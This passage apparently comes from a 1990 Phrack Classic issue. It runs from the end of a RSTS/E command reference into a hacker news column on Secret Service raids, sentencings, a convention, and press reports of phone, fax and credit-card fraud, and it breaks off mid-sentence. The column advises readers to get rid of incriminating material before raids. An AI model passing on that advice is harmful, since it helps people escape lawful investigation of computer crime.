  4681. *SET QUEUE/ENTRY
  4682. The SET QUEUE/ENTRY command changes the status of a file that is queued
  4683. for printing or for batch job execution but is not yet processed by the
  4684. system.
  4685.  
  4686. Format
  4687.  
  4688. SET QUEUE/ENTRY=sequence-number  [queue-name[:]]
  4689.  
  4690.     Additional
  4691. Command Qualifiers                  Defaults
  4692.  
  4693.    /AFTER=date-time                 none
  4694.    /BATCH
  4695.    /FORMS=type
  4696.    /HOLD
  4697.    /JOB_COUNT=n
  4698.    /PRIORITY=n
  4699.    /RELEASE
  4700.  
  4701. If you do not specify a queue name, LP0: is assumed.
  4702.  
  4703. See also:  DELETE/ENTRY, SET QUEUE/JOB
  4704.  
  4705. *SET QUEUE/JOB
  4706.  
  4707. The SET QUEUE/JOB command uses the name of a job to modify the status
  4708. of a file that is queued for a printer or batch queue.
  4709.  
  4710. Format
  4711.  
  4712. SET QUEUE/JOB=job-name [queue-name[:]]
  4713.  
  4714. Command Qualifiers                  Defaults
  4715.  
  4716.    /AFTER=date-time                 None.
  4717.    /BATCH
  4718.    /FORMS=type
  4719.    /HOLD
  4720.    /JOB_COUNT=n
  4721.    /PRIORITY=n
  4722.    /RELEASE
  4723.  
  4724. When you submit a batch job or issue the PRINT command, the job is
  4725. assigned a name, according to the first input file specification or
  4726. the name you specify.  You can use this name to modify the status of
  4727. the job in the queue.
  4728.  
  4729. See also:  DELETE/JOB, SET QUEUE/ENTRY
  4730.  
  4731. *SET TERMINAL
  4732. The SET TERMINAL command lets you specify the characteristics of your
  4733. terminal. Privileged users can also set the characteristics of other
  4734. terminals.
  4735.  
  4736. Format
  4737.  
  4738. SET TERMINAL [device-name[:]]
  4739.  
  4740. Command Qualifiers                  Defaults
  4741.  
  4742.    /[NO]BROADCAST                   /NOBROADCAST
  4743.    /CRFILL[=n]                      /CRFILL=0
  4744.    /[NO]ECHO                        /ECHO
  4745.    /[NO]HARDCOPY
  4746.    /LA34
  4747.    /LA36
  4748.    /LA38
  4749.    /LA120
  4750.    /[NO]LOWERCASE
  4751.    /PARITY=EVEN                     /NOPARITY
  4752.            ODD
  4753.    /NOPARITY
  4754.    /[NO]SCOPE
  4755.    /SPEED=n
  4756.    /SPEED=(i,o)
  4757.    /[NO]TAB                         /NOTAB
  4758.    /[NO]TTSYNC                      /TTSYNC
  4759.    /[NO]UPPERCASE
  4760.    /VT05
  4761.    /VT52
  4762.    /VT55
  4763.    /VT100
  4764.    /WIDTH=n
  4765.  
  4766. See also:  SHOW TERMINAL
  4767.  
  4768. *SHOW DEVICES
  4769. The SHOW DEVICES command displays the status of devices
  4770. that have disks mounted on them or that are allocated to jobs.
  4771.  
  4772. See also:  MOUNT, ALLOCATE
  4773.  
  4774. *SHOW QUEUE
  4775. The SHOW/QUEUE command displays a list of entries in the printer
  4776. and/or batch job queues.
  4777.  
  4778. Format
  4779.  
  4780. SHOW QUEUE [queue-name[:]]
  4781.  
  4782. Command Qualifiers
  4783.  
  4784.    /BATCH
  4785.    /BRIEF
  4786.  
  4787. Queue: queue-name[:]
  4788.  
  4789. To display the queue of your system's default printer, type:
  4790.  
  4791. $ SHOW QUEUE
  4792.  
  4793. If there are no files in the queue, RSTS/E prints a message
  4794. similar to:
  4795.  
  4796. LP0 queue is empty
  4797.  
  4798. *SHOW NETWORK
  4799. The SHOW NETWORK command displays the systems you can connect
  4800. to by the network. If the network is operational, RSTS/E displays
  4801. the names of different nodes that your system can access.
  4802.  
  4803. Format
  4804.  
  4805. SHOW NETWORK
  4806.  
  4807. See also:  SET HOST
  4808.  
  4809. *SHOW SYSTEM
  4810. The SHOW SYSTEM command displays information about use of the
  4811. system's resources. Specifically, it displays information about
  4812. the status of all jobs, attached and detached, in use on the system.
  4813.  
  4814. Format
  4815.  
  4816. SHOW SYSTEM
  4817.  
  4818. The only difference between SHOW SYSTEM and SHOW USERS is that the
  4819. SHOW SYSTEM command includes information about the status of detached
  4820. jobs.
  4821.  
  4822. See also:  SHOW USERS
  4823.  
  4824. *SHOW TERMINAL
  4825. The SHOW TERMINAL command displays the characteristics of your
  4826. terminal. Most of these characteristics can be changed with a
  4827. corresponding option of the SET TERMINAL command. (Users with
  4828. privileged accounts can display the characteristics of other terminals.)
  4829.  
  4830. Format
  4831.  
  4832. SHOW TERMINAL [device-name[:]]
  4833.  
  4834. See also:  SET TERMINAL
  4835.  
  4836. *SHOW USERS
  4837. The SHOW USERS command displays information about the status of
  4838. attached jobs on the system.
  4839.  
  4840. Format
  4841.  
  4842. SHOW USERS
  4843.  
  4844. See also:  SHOW SYSTEM
  4845.  
  4846. *SUBMIT
  4847. The SUBMIT command enters one or more control files for batch processing.
  4848.  
  4849. Format
  4850.  
  4851. SUBMIT file-spec[,...]
  4852.  
  4853. Command Qualifiers                  Defaults
  4854.  
  4855.    /AFTER=date-time
  4856.    /NAME=job-name
  4857.    /PRIORITY=n                     /PRIORITY=128
  4858.    /QUEUE=quename
  4859.  
  4860. File Qualifiers                     Defaults
  4861.  
  4862.    /[NO]DELETE                      /NODELETE
  4863.  
  4864. Prompts
  4865.  
  4866. File: file-spec[,...]
  4867.  
  4868. See also:  DELETE/JOB, SET QUEUE/JOB
  4869.  
  4870. *TYPE
  4871. The TYPE command displays the contents of a text file (as opposed
  4872. to a binary or temporary file).
  4873.  
  4874. Format
  4875.  
  4876. TYPE [node::]file-spec[,...]
  4877.  
  4878. Command Qualifiers                  Defaults
  4879.  
  4880.    /OUTPUT=file-spec                /OUTPUT=KB:
  4881.    /[NO]QUERY                       /NOQUERY
  4882.  
  4883. Prompts
  4884.  
  4885. File: file-spec[,...]
  4886.  
  4887. To temporarily halt the display of a file, use <CTRL/S>.  To resume
  4888. output where it was interrupted, use <CTRL/Q>. (On a VT100 terminal
  4889. you can also press the NO SCROLL key to stop and restart output.)
  4890.  
  4891. To suppress the display but continue command processing, use <CTRL/O>.
  4892. If you press <CTRL/O> again before processing is completed, output
  4893. resumes at the current point in command processing.
  4894.  
  4895. To stop command execution entirely, press <CTRL/C>.  The use of
  4896. <CTRL/C> returns you to DCL command level.
  4897.  
  4898. See also:  COPY
  4899.  
  4900. ------------------------------------------------------------------------------
  4901.  
  4902. Hope that this file brought back memories for you guys.  It did for me! 8^]
  4903.  
  4904.                                                    Crimson Death
  4905. _______________________________________________________________________________
  4906.  
  4907.                               ==Phrack Classic==
  4908.  
  4909.                      Volume Three, Issue 32, File #10 of 12
  4910.  
  4911.  
  4912.                         KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
  4913.  
  4914.                               K N I G H T L I N E
  4915.  
  4916.                               Issue 001 / Part I
  4917.  
  4918.                             17th of November, 1990
  4919.  
  4920.                               Written, compiled,
  4921.  
  4922.                            and edited by Doc Holiday
  4923.  
  4924.                         KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
  4925.  
  4926.                                       ---
  4927.  
  4928.     Welcome to the 5th year of Phrack and the first edition of KnightLine!
  4929.  
  4930.                                       ---
  4931. SunDevil II: The witch-hunt continues..
  4932.  
  4933. I hate to start out on such a sour note, but:  Inside sources have reported an
  4934. enormous amount of Secret Service activity in major U.S.  cities.
  4935. Furthermore, sources claim that new investigations are underway for the
  4936. prosecution of all Legion Of Doom members.
  4937.  
  4938. The investigations have "turned up" new evidence that could bring about
  4939. the sequel to SunDevil.
  4940.  
  4941. This information comes from reliable sources and I suggest that all precautions
  4942. should be taken to protect yourselves from a raid.
  4943.  
  4944. Some good advice to follow:
  4945.  
  4946. A>   Refrain from using "codes", or other means to commit toll fraud.
  4947.  
  4948. B>   Further yourselves from those who are overwhelmed with desire to tell
  4949.      you their recent conquests of computer systems.
  4950.  
  4951. C>   Refrain from downloading or storing stolen Unix source code.
  4952.  
  4953. D>   Get rid of anything that might incriminate you or your peers.
  4954.  
  4955. E>   Stay cool, calm, and collected.
  4956.  
  4957.  
  4958. The Conflict has submitted a file to KL about what to do IF YOU ARE raided.
  4959.  
  4960. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4961.  
  4962.                  Simple Guidelines To Follow If You Encounter
  4963.                Law Enforcement Agents In An Unfriendly Situation
  4964.  
  4965.      The current state of the Computer Underground is an extreme turmoil.
  4966.      The recent threat of another series of witchhunt raids has put many
  4967.      people into a state of paranoia, and rightfully so.  Noone needs to
  4968.      deal with all the bullshit associated with a bust.  I am offering a
  4969.      few guidelines to follow if you encounter a precarious situation
  4970.      instigated by a law enforcement agent; of course, it is up to you to
  4971.      decide what you want to do.  Of the people whom I have spoken with,
  4972.      these will be some of the best steps to follow if you receive an
  4973.      unexpected visit.
  4974.  
  4975.           Probably the first thing you would want to do if you receive an
  4976.      unfriendly visit from Joe Fed is to READ the damn warrant.  Find
  4977.      out why you have been chosen, and what they are looking for.  Also,
  4978.      remember that if they have only a search and seizure warrant, they
  4979.      are warranted only to confiscate items on your premises; however, if
  4980.      they are serving a subpoena, they may take what they need, on or off
  4981.      your premises.  So, in essence, the clean-house preventive measure
  4982.      may or may not be useful to you.
  4983.  
  4984.           An important thing to do when Agent Foley (or one of his lesser
  4985.      evil counterparts) comes knocking on your door is to cooperate fully.
  4986.      Drop a lot of "Yes sir"/"No sir" answers; respond politely.  You're
  4987.      in no position to be a smart ass, and being friendly surely can not
  4988.      hurt you.
  4989.  
  4990.           Another important thing to remember, although it is almost
  4991.      opposite of the aforementioned, has to do with what to say.  In
  4992.      essence, do not say a fucking thing if you are questioned!  Remember,
  4993.      anything you say or do can and WILL be used AGAINST you in a court of
  4994.      law.  Simply reply, "I can not answer any questions without counsel",
  4995.      or "I first must contact my attorney."  You need not answer a damn
  4996.      thing they ask of you without an attorney present, and it would most
  4997.      probably be very detrimental to do so.
  4998.  
  4999.           This hint parallels the previous one.  No matter what you do,
  5000.      do not reply to any question with "I don't know anything", or any
  5001.      simple derivation of that phrase.  If you do, and you are indicted,
  5002.      you will be reamed in court.  The presence of that statement could
  5003.      greatly damage your defense, unless you are conditionally mental or
  5004.      something.
  5005.  
  5006.           In essence, those are all you should need.  What I have outlined
  5007.      is very simple, but logical.  You need to keep a level head at least
  5008.      while they are on site with you; get pissed off/psycho later, after
  5009.      they leave.  If you are currently an active member of the Computer
  5010.      Underground, you may wish to lose anything that is important to you,
  5011.      at least temporarily.  Why?  Well, the analogy I was given follows
  5012.      that:  if you were suspected of racketeering, the feds could execute
  5013.      a search and seizure on your property.  If they can prove by 51% that
  5014.      ANY of the confiscated material COULD have been used in your suspected
  5015.      racketeering, it is forfeited (i.e. you lost it, for good).  The
  5016.      forfeiture stands whether or not you are indicted or convicted!  So,
  5017.      you would be entirely screwed.
  5018.  
  5019.      All of the aforementioned steps are important.  Those are all I really
  5020.      have to offer.  I suggest that you get clean before the sweep occurs,
  5021.      and that you stay clean until after the sweep clears.  Exercise
  5022.      extreme caution.  Keep your head high, and keep your back to the wall
  5023.      (otherwise, it would be quite possible to find a knife lodged in it).
  5024.      Stay safe, and good luck!
  5025.  
  5026.      The Conflict
  5027.       11-13-1990
  5028.  
  5029. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5030. ***UPDATE.11/16/90:  3 Hackers are DOOMED to prison
  5031.  
  5032.      Frank Darden (Leftist), Adam Grant (Urvile), and Robert Riggs (Prophet)
  5033. were sentenced Friday.  Robert, who was currently on probation before the
  5034. incident was sentenced to 21 months in a federal prison.  Frank and Adam were
  5035. received sentences of 14 months.  All three were ordered to pay $233,000 in
  5036. restitution.
  5037.  
  5038.      Kent Alexander, an assistant U.S. attorney who prosecuted the case, was
  5039. not available for comment.
  5040.  
  5041.                                       ---
  5042.      This is not good for the Underground at all.  I'm sure the government will
  5043. use the outcome of this to their advantage in speeding up the momentum of
  5044. prosecuting hackers.  In their eyes, everyone is in LOD.
  5045.  
  5046.      Dale Boll, a special agent of the Secret Service in Washington, said
  5047. "Telephone companies are preparing for a retaliation from the hacking
  5048. underworld and are beefing up security at all ends of the wire."
  5049.  
  5050.      I can't verify or validate these rumors of retaliation.  But I can say if
  5051. you are going to do some sort of retaliation, I would think twice-- It could
  5052. make things worse.  This is not a "game" we are playing.  No, it's reality.
  5053. And I'm sured Frank, Adam, and Rob are feeling it right now.
  5054.                                       ---
  5055. A few words from Erik Bloodaxe on the sentences:
  5056.  
  5057. "I'm not surprised in the least at the sentencing.  However, I'm sure the three
  5058. of them are.  I wish I could ask them if all the singing was worth-while in the
  5059. long-run.  How can anyone hope to make a deal with federal officals, who with
  5060. in the past year, resorted to such lies and deceit.  Everyday I think all this
  5061. will be over and I can get on with my life and possibly use my own computer to
  5062. write a term paper without fear of it's confiscation due to who or what I know
  5063. or have seen or done in the past.  Perhaps this will end eventually, but until
  5064. then Mr.  Cook will play on the peoples inherient fear of technology and
  5065. exploit everyone in his past on his personal crusade for his own twisted view
  5066. of justus.  Are you or have you ever been a member of the Legion of Doom?  Tell
  5067. me, do you believe in reincarnation Senator McCarthy?"
  5068.  
  5069. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5070.  
  5071.             "The weirdest part of my dream was... when I woke up."
  5072.  
  5073.                           And now.... .. ANNOUNCING:
  5074.  
  5075.                                The first annual,
  5076.  
  5077.                               X M A S C O N  '90
  5078.  
  5079.                               Where: Houston, TX
  5080.                          When: December 28th-30th 1990
  5081.                Who: All Hackers, Journalists, and Federal Agents
  5082.  
  5083.      Well, it's getting closer.. XmasCon is next month and we plan on having
  5084. the biggest gathering of Hackers & Feds since SummerCon '88!
  5085.  
  5086.      This event was going to be private until word got out.  A journalist
  5087. (unnamed) found out about the private event and decided to make it public news
  5088. in the magazine for which he writes.  Well, after seeing the words: "XMASCON"
  5089. in a magazine with less readers than Phrack, we decided to announce it
  5090. ourselves.  So, here it is-- Your OFFICIAL invitation to the gathering that
  5091. should replace the painful memories of SummerCon'90 (SCon'90? What do you mean?
  5092. there was a SummerCon this year? HA. It surprised me too).
  5093.  
  5094.                               Hotel Information:
  5095.                                  La Quinta Inn
  5096.                                6 North Belt East
  5097.                                 (713) 447-6888
  5098.                   (Located next to Intercontinental Airport)
  5099.  
  5100.                        Fees: $44.00+TAX a night (single)
  5101.                           $56.00+TAX a night (double)
  5102.  
  5103.                          Government Discount (With ID)
  5104.                           $49.00+TAX a night (single)
  5105.                           $37.00+TAX a night (double)
  5106.  
  5107.                                 1-800-531-5900
  5108.  
  5109.  
  5110. Call for reservations in advance.  Please tell the registar that you are with
  5111. XmasCon'90.  Everyone is welcome to attend, and I do mean EVERYONE.
  5112.  
  5113.  
  5114. Take care & see you at HoHoCon!
  5115.  
  5116.                    --DH
  5117.  
  5118. _______________________________________________________________________________
  5119.  
  5120.                            F R O M   T H E   W I R E
  5121.  
  5122.  
  5123. HEADLINE  Thirteen Arrested For Breaking Into University Computer
  5124.           Byline:   PAT MILTON
  5125. DATE      08/16/90
  5126. SOURCE    The Associated Press (ASP)
  5127.           Origin:   FARMINGDALE, N.Y.
  5128.           (Copyright 1990.  The Associated Press.  All Rights Reserved.)
  5129.  
  5130.  
  5131. * FARMINGDALE, N.Y.  (AP) _ Thirteen computer hackers ranging in age from 14 to
  5132. 32 were charged Thursday with breaking into the mainframe computer at a
  5133. university in Washington state and causing costly damage to the files.  One of
  5134. the suspects is a 14-year-old high school student from New York City who is
  5135. also a suspect in last November's break-in of an Air Force computer in the
  5136. Pentagon, according to Senior Investigator Donald Delaney of the New York State
  5137. Police.  The student, who used the name "Zod" when he signed onto the computer,
  5138. is charged with breaking into the computer at the City University of Bellevue
  5139. in Washington in May by figuring out the toll-free telephone number that gave
  5140. students and faculty legitimate  access to the system.
  5141.  
  5142. "Zod," who was not identified because he is a minor, maintained control over
  5143. the system by setting up his own program where others could illegally enter the
  5144. system by answering 11 questions he set up.
  5145.  
  5146. More than 40 hackers across the country are believed to have gained illegal
  5147. access to the system since May, Delaney said.  As a result of the break-in,
  5148. university files were altered and deleted, and consultants must be hired to
  5149. reprogram the system, Delaney said.  In addition to the arrests, search
  5150. warrants were executed at 17 locations on Thursday where officers confiscated
  5151. $50,000 worth of computers and related equipment.  Three more arrests were
  5152. expected.  Two of the 13 arrested were from Long Island and the rest were from
  5153. the New York boroughs of Brooklyn, Queens, Manhattan and the Bronx.
  5154. Farmingdale is on Long Island.  The 13 were charged with computer tampering,
  5155. computer trespass, unauthorized use of a computer and theft of services.  The
  5156. juveniles will be charged with juvenile delinquency.
  5157.  
  5158. The investigation began two months ago after a technician at the university
  5159. noticed "error message" flashing on the computer screen, indicating someone had
  5160. entered the system illegally.  The suspects were traced through subpoenaed
  5161. telephone records.  * Many hackers break into private computer systems for the
  5162. pure satisfaction of cracking the code, and also to obtain sometimes costly
  5163. computer programs, Delaney said.
  5164. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5165.  
  5166.  
  5167.  
  5168. _______________________________________________________________________________
  5169.  
  5170.  
  5171. HEADLINE  US Sprint helps business customers battle PBX fraud
  5172. DATE      09/25/90
  5173. SOURCE    BUSINESS WIRE (BWR)
  5174.  
  5175.  
  5176. KANSAS CITY, Mo.--(BUSINESS WIRE)--US Sprint Wednesday announced its corporate
  5177. security department will help the company's business customers battle PBX
  5178. fraud.  After producing significant results in fighting code abuse US Sprint is
  5179. directing their efforts to help their business customers in identifying and
  5180. preventing computer hackers from infiltrating their business customer's owned
  5181. or leased telephone switching equipment.  ``Unauthorized use of our
  5182. long-distance service has been greatly reduced through increased detection,
  5183. prevention, investigation and prosecution efforts,'' said Bob Fox, US Sprint
  5184. vice president corporate security.
  5185.  
  5186. ``Now rather than attacking a long-distance carrier's network in * an attempt
  5187. to steal authorization codes, computer hackers are attacking private companies'
  5188. and governmental agencies' Private Branch Exchanges (PBX's).  Computer
  5189. hackers break into private telephone switches in an attempt to reoriginate
  5190. long-distance calls, which are then billed to the businesses.  Fox says a
  5191. business may not discover its telephone system has been ``hacked'' until their
  5192. long-distance bill is received and then it may be too late.  Help is on the way
  5193. however.  US Sprint has started a customer support program to help the
  5194. company's business customers to combat the situation.  Del Wnorowski, US Sprint
  5195. senior vice president-general counsel said, ``The new program is customers
  5196. about the potential for telecommunications fraud committed through their owned
  5197. or leasesd switching equipment and to assist them in preventing this type of
  5198. illegal activity.'' US Sprint is a unit of United Telecommunications Inc., a
  5199. diversified telecommunications company headquartered in Kansas City.
  5200.  
  5201. CONTACT:
  5202. US Sprint, Kansas City.
  5203. Phil Hermanson, 816/276-6268
  5204. _______________________________________________________________________________
  5205.  
  5206.  
  5207. HEADLINE  Fax pirates find it easy to intercept documents
  5208. DATE      09/10/90
  5209. SOURCE    Toronto Star   (TOR)
  5210.           Edition:  METRO
  5211.           Section:  BUSINESS TODAY
  5212.           Page:     B4
  5213.           (Copyright The Toronto Star)
  5214.  
  5215.  
  5216.           ---      Fax pirates find it easy to intercept documents         ---
  5217.  
  5218. TOKYO (Special) - Considering that several years ago enthusiastic hackers began
  5219. breaking into computer systems worldwide to steal valuable information, it
  5220. could only have been a matter of time before the same problem surfaced for
  5221. facsimile machines.  Now, officials of Nippon Telegraph and Telephone Public
  5222. Corp.  report evidence that this has been happening, not only in their own
  5223. country but around the globe.  Apparently, anyone with just a little knowledge
  5224. of electronics can tap fax messages being sent from one of these relatively
  5225. unsophisticated machines to another, with the duplication printed out on the
  5226. pirate's facsimile machine.  Both the sender and the receiver of the faxed
  5227. document remain completely unaware that they have been bugged.  "I shudder to
  5228. think of some of the business documents which only recently moved over my
  5229. company's fax machines being examined by our competitors," one Tokyo executive
  5230. nervously admits when informed that there has been a proliferation of tapping.
  5231. "You don't think the tax people are doing it too?" he then asks in mock terror.
  5232.  
  5233.      It is certainly a frightening thought.  The technique involves making a
  5234. secret connection with the telephone line of the party whose fax messages are
  5235. to be intercepted.  That is all too easy to accomplish, according to officials
  5236. of Nippon Telegraph and Telephone.  Apart from a few special cases, very little
  5237. has been done to guard against outside tapping.  As a result, one of the most
  5238. vulnerable areas - and one most businessmen and women now should begin to feel
  5239. unsure of - is the privacy or security of the facsimile machine.  Technical
  5240. attention to this problem is in order.
  5241.  
  5242.      "The idea that somewhere out there is 'Conan the Hacker' who is reading my
  5243. fax correspondence as readily as I do sends chills up my spine," says one
  5244. American businesswoman here.  "There could be a lot of trouble for me and up to
  5245. now I didn't even realize it was possible." It is not only possible, but easy.
  5246. Ordinary components available at any electronics store can be used.  With these
  5247. in hand, tappers can rig up a connection that sets off a warning signal,
  5248. without the sender or receiver realizing it, whenever a fax message passes
  5249. along the telephone line.  Considering the growing volume of highly
  5250. confidential material being sent and received via fax equipment, the resulting
  5251. leaks can be considered highly dangerous to the security of corporate
  5252. information.
  5253.  
  5254.      In Japan alone it is estimated that there are 3.7 million
  5255. machines in operation.  Given the nature of these tapping operations, it would
  5256. appear to be extremely difficult for companies to determine whether they are
  5257. suffering serious damage from this process.  In addition, it is clear that a
  5258. great many corporations have yet to realize the extent of the threat to their
  5259. privacy.  "If more business executives recognized what is going on," suggests
  5260. one Japanese security specialist, "they would move now to halt the opportunity
  5261. for leaks and thus protect their corporations from this type of violation." He
  5262. went on to note that third parties mentioned in fax messages also can be badly
  5263. hurt by these interceptions.  Fortunately, manufacturers are producing machines
  5264. capable of preventing hackers from tapping into the system.  In some cases,
  5265. newly developed fax machines use code systems to defend information
  5266. transmitted.  But these tap-proof facsimile machines are not yet in general
  5267. use.  Makers of the new "protected" facsimile machines predict that once the
  5268. business communities around the globe become aware of the threat they will
  5269. promptly place orders for replacements and junk their old equipment as a simple
  5270. matter of damage control.  The market could prove extremely large.  Those few
  5271. leak-proof fax machines now in operation depend upon scrambling messages, so
  5272. that even if a pirate taps into the telephone line leading to the unit, the
  5273. intercepted message is impossible to read.
  5274.  
  5275.      Nippon Telegraph and Telephone, for example, claims that it would require
  5276. a hacker using a large computer more than 200,000 years to crack the codes used
  5277. in its own pirate-proof fax.  This ultimately may prove to be something of an
  5278. exaggeration.  Although in Japan and many other countries this kind of tapping
  5279. clearly is illegal, it remains nearly impossible to track down electronic
  5280. eavesdroppers.  As far as is known, none of these snoopers have been identified
  5281. and dragged into court.  Security specialists in Japan claim that there may be
  5282. thousands of fax hackers who get their kicks out of intercepting and reading
  5283. other people's business mail, with few using the information for illegal
  5284. purposes or actively conveying it to third parties.
  5285. _______________________________________________________________________________
  5286.  
  5287.  
  5288. HEADLINE  Inmate behind scams
  5289.           Byline:   JOHN SEMIEN
  5290. DATE      09/11/90
  5291. SOURCE    THE BATON ROUGE SUNDAY ADVOCATE   (BATR)
  5292.           Section:  NEWS
  5293.           Page:     1-B
  5294.           (Copyright 1989 by Capitol City Press)
  5295.  
  5296.  
  5297.      There wasn't much inmate Lawrence "Danny" Faires couldn't buy, sell or
  5298. steal with a telephone call from his jail cell in Miami when his million-dollar
  5299. fraud ring ran afoul of the U.S.  Secret Service in 1989.  That was the year
  5300. Faires used a portable computer with an automatic dialing program to "hack out"
  5301. access codes to the long-distance lines of Telco Communications Inc., a Baton
  5302. Rouge-based phone company.  Telco officials were alarmed when they spotted
  5303. 1,500 attempts at gaining unauthorized access to the company's long-distance
  5304. service in a single 12-hour period in January 1989.
  5305.  
  5306.      Convinced that an organized fraud scheme was at work, Telco called
  5307. Resident Agent Phil Robertson, who heads the service's Baton Rouge office.
  5308.  
  5309. "They told me they felt they were being attacked by hackers who had discovered
  5310. their long-distance access lines and who were hacking out personal
  5311. identification numbers belonging to their customers," Robertson said Monday.
  5312.  
  5313. "You are billed based on your pin (access) number.  The computer hacker had
  5314. located several of their 800 numbers and had entered digits hoping it would be
  5315. a valid pin number." Using computer records, Robertson said agents were able to
  5316. isolate 6,000 fraudulent Telco calls that were made during a three-week period
  5317. of January.  More than a third of those calls were traced to a cell block in
  5318. the Dade County Interim Detention Center that has been home for Faires for the
  5319. past four years.  Faires is awaiting trial in Miami on first-degree murder
  5320. charges.  "As it turned out, all of the inmates in this cell block are awaiting
  5321. trial," Robertson said.  "One of the inmates, Danny Faires, had a computer in
  5322. his cell attached to a modem, and he turned out to be the hacker."
  5323.  
  5324. "All he had to do was plug his modem in, let it make the calls and check his
  5325. printout for the numbers that came back good," the agent said.  In checking out
  5326. the other bogus Telco calls, agents uncovered a massive credit card scam.  A
  5327. federal grand jury in Milwaukee, Wis., linked both scams to Faires and alleged
  5328. associates of the inmate across the country in a Feb.  27 indictment of six
  5329. people on federal wire and access device fraud.  Fairies, an unindicted
  5330. co-conspirator in the case, last week said he has spent the past three years
  5331. applying his previous experience as a computer systems analyst and programmer
  5332. to a lap-top, portable computer provided by one of the prison guards.  He
  5333. describes the results as "doing business with America" at the expense of large
  5334. credit card and telecommunications companies.  Faires said he attacked Telco's
  5335. system by chance after receiving one of the company's access numbers in a group
  5336. of assorted access codes acquired by his associates.  "It was just their
  5337. misfortune that we became aware that they had a system there that was easily
  5338. accessible," Faires said in a telephone interview.
  5339.  
  5340.      "I was given their access number, along with Sprint and MCI, I guess
  5341. virtually every company in America we got." Faires said he used the stolen,
  5342. long distance phone time and other stolen credit card numbers to access
  5343. networks with credit information from major department stores and mail order
  5344. businesses.  "You come up to the door and the door is locked," he said.  "You
  5345. have to buy access.  Well, I bought access with credit cards from another
  5346. system.  I had access codes that we had hacked.  "I could pull your entire
  5347. credit profile up and just pick the credit card numbers that you still had some
  5348. credit in them and how many dollars you had left in your account and I would
  5349. spend that," Faires said.  "My justification was, I don't know the creditor and
  5350. he had no knowledge of it so he won't have to pay it." However, Faires said he
  5351. now thinks of the trouble the illegal use of the credit cards has caused his
  5352. victims in their efforts to straighten out damaged credit records.  "I remember
  5353. I took a course once that was called computer morality about the moral ethics
  5354. to which we're morally bound," he said.  "It's like a locksmith.  Even though
  5355. he can open a lock, he's morally bound not to if it's not his lock.  I violated
  5356. that."
  5357.  
  5358.      The vulnerability of credit card companies to hackers is the subject of an
  5359. unpublished book that Faires said he has written.  Faires said his book
  5360. includes tips on how businesses and others can safeguard access to their
  5361. credit, but added that there may be no way to be completely safe from
  5362. hackers.  "It's untitled as yet," he said about the book.  "We're leaving that
  5363. open.  I'm waiting to see if they electrocute me here, then I'm going to put
  5364. something about "I could buy it all but couldn't pay the electric bill.' "
  5365. [This guy is a real toon -DH]
  5366.  
  5367.      While Faires has not been formally charged in connection with the scheme,
  5368. last week he said he was sure charges will be forthcoming because "there is no
  5369. question about my involvement." The other six alleged conspirators are John
  5370. Carl Berger and George A.  Hart Jr.  of Milwaukee, Wis.; Charles Robert McFall
  5371. and Victor Reyes of San Antonio, Texas; Steven Michael Skender Jr.  of West
  5372. Allis, Wis.; and Angelo Bruno Bregantini of Marshville, N.C.  All six men are
  5373. charged with conspiracy to commit access device and wire fraud.  Berger,
  5374. Skender, Reyes and Bregantini also are charged separately with multiple counts
  5375. of wire fraud.
  5376.  
  5377.      The indictments are the first criminal charges generated by Operation
  5378. Mongoose, an ongoing Secret Service probe of credit card and long-distance
  5379. telephone access fraud.  The charges allege that Faires has had access to a
  5380. telephone since his arrest and imprisonment in Miami in 1986, an allegation
  5381. that has prompted a separate probe by Miami authorities.  That phone was used
  5382. to make frequent calls to a building on Brookfield Road in Brookfield, Wis.,
  5383. where another alleged unindicted co-conspirator, Fred Bregantini, operates
  5384. various businesses, according to the indictment.  The indictment said Faires
  5385. and Fred Bregantini were "at the hub" of the telephone and credit card scam.
  5386. The two men are accused of collecting credit card numbers and telephone access
  5387. codes from other defendants in the case and using the numbers to purchase
  5388. merchandise, services and "other things of value." Robertson said agents
  5389. believe the members of the ring copied many of these stolen numbers from credit
  5390. card receipts retrieved from the trash cans of various businesses.  He said the
  5391. practice, commonly called "dumpster diving," is a widely used method in credit
  5392. card fraud. [`dumpster  diving' eh? -DH]
  5393.  
  5394.      While some of the defendants helped make purchases on the stolen cards,
  5395. the indictment alleges that others provided addresses used for the shipment of
  5396. the stolen goods.  The goods included gold coins, plane tickets, computer
  5397. equipment, tools and stereo equipment.  Robertson said agents are still
  5398. tallying the cost of the scam to Telco and other companies but that the damage
  5399. has already climbed past $1 million.  Herbert Howard, president of Telco, on
  5400. Friday said the company lost from $35,000 to $40,000 in revenues from illegal
  5401. calls and in additional expenses for researching Faires' use of access codes.
  5402. "It was really a learning experience for us because this is the first time this
  5403. has happened," Howard said about his 2-year-old company.  "I think it's a fear
  5404. of all long-distance companies.  It's very fortunate that we caught it as
  5405. quickly as we did."
  5406. _______________________________________________________________________________
  5407.  
  5408. HEADLINE  No, I'm not paranoid, but who is No. 1?
  5409.           Byline:   DENISE CARUSO
  5410.           Column:   INSIDE SILICON VALLEY
  5411. DATE      08/21/90
  5412. SOURCE    SAN FRANCISCO EXAMINER   (SFEX)
  5413.           Edition:  FIFTH
  5414.           Section:  BUSINESS
  5415.           Page:     D-16
  5416.           (Copyright 1989)
  5417.  
  5418.  
  5419.      THOUGH I didn't plan it that way, this week proved to be a perfect time to
  5420. start renting old episodes of "The Prisoner" - that very dark, very paranoid
  5421. British spy series from the early '60s which foresaw a bleak future in which
  5422. "een-formation" was of paramount importance, no matter whose "side" you were
  5423. on.  Every well-paid company representative from every telephone service
  5424. provider in North America earned his or her keep this week, fielding calls from
  5425. blood-thirsty members of the press corps who also wanted "een-formation" about
  5426. whether or not the huge long-distance snafu with AT&T was a "hack" (an illegal
  5427. break-in) or some form of computerized germ warfare.
  5428.  
  5429.      I'm happy that the answer was "no," but of course the event opens a rather
  5430. nasty can of worms:  has AT&T's problem tipped off the hacker community that
  5431. the phone network is vulnerable?  "That's a very good question," said one
  5432. network engineer I spoke with last week.  But, he assured me, his network was
  5433. totally secure and had all kinds of safeguards built in to prevent either
  5434. outside penetration or the introduction of a software virus to the system.  I
  5435. hope he's right, but I must admit, I've heard that song before.
  5436.  
  5437.      Here, for example, is an excerpt from an anonymous piece of electronic
  5438. mail I received last week, slightly edited to correct grammatical
